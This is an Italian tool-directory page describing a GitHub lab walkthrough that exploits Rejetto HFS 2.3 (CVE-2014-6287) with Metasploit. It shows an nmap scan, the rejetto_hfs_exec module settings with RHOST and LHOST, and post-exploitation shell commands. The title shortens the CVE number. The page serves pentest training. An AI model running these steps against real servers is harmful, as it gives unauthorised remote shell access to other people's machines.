Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE su HFS 2.3 - CVE-2014-62 | Kitploit
Strumenti/GitHubGitHub/sage954526/hfs_exploit_project
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE su HFS 2.3 - CVE-2014-62

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

HFS_EXPLOIT_PROJECT

Metasploit RCE su HFS 2.3 - CVE-2014-62

🔖 Titolo del Progetto

> Esecuzione di codice remoto tramite HTTP File Server (HFS 2.3)

⚙ Strumenti Utilizzati • Kali Linux • Nmap • Metasploit • Target: HFS 2.3 su Windows 7

🔐 Dettagli della Vulnerabilità • Nome: CVE-2014-6287 • Tipo: Esecuzione di codice remoto • Causa: Input non validato nello scripting HFS • Impatto: Accesso shell non autenticato

🔍 Metodologia (Passo dopo Passo)

🔹 Passo 1: Raccolta Informazioni (Nmap)

•    nmap -sV demo.ine.local (ip del target) 
•    porta aperta trovata : 80
•    servizio : rejetto HTTP file server 2.3

Scansione Nmap

Nmap

🔹 Passo 2: Sfruttamento (Metasploit)

• Msfconsole
• Cerca HFS o rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

Configurazione Exploit

Exploit Exploit

🔹 Passo 3: Post-Exploitation

dopo l'esecuzione otterrai una sessione meterpreter usa il comando : shell

• whoami • ipconfig • dir

Accesso Shell

Shell

Shell

Scarica lo strumento